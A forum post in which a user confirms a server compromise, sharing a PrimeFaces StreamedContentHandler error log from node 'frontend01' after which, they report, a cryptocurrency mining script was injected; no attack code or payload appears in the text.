- Posts: 33
- Joined: 02 Apr 2012, 15:24
Yes i can confirm this too.
Copied "as found" in my log (including the empty lines, [Server:frontend01 is the node's name]).
Right after this snippet the mining-script is injected.
Thanks for your help and your time!
Code: Select all
[Server:frontend01] 23:22:14,785 SEVERE [org.primefaces.application.resource.StreamedContentHandler] (default task-29) Error in streaming dynamic resource. java.lang.IllegalArgumentException: Cannot convert
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01] of type class java.lang.String to interface org.primefaces.model.StreamedContent
Right after this snippet the mining-script is injected.
Thanks for your help and your time!
-
- Information
-
Who is online
Users browsing this forum: No registered users and 23 guests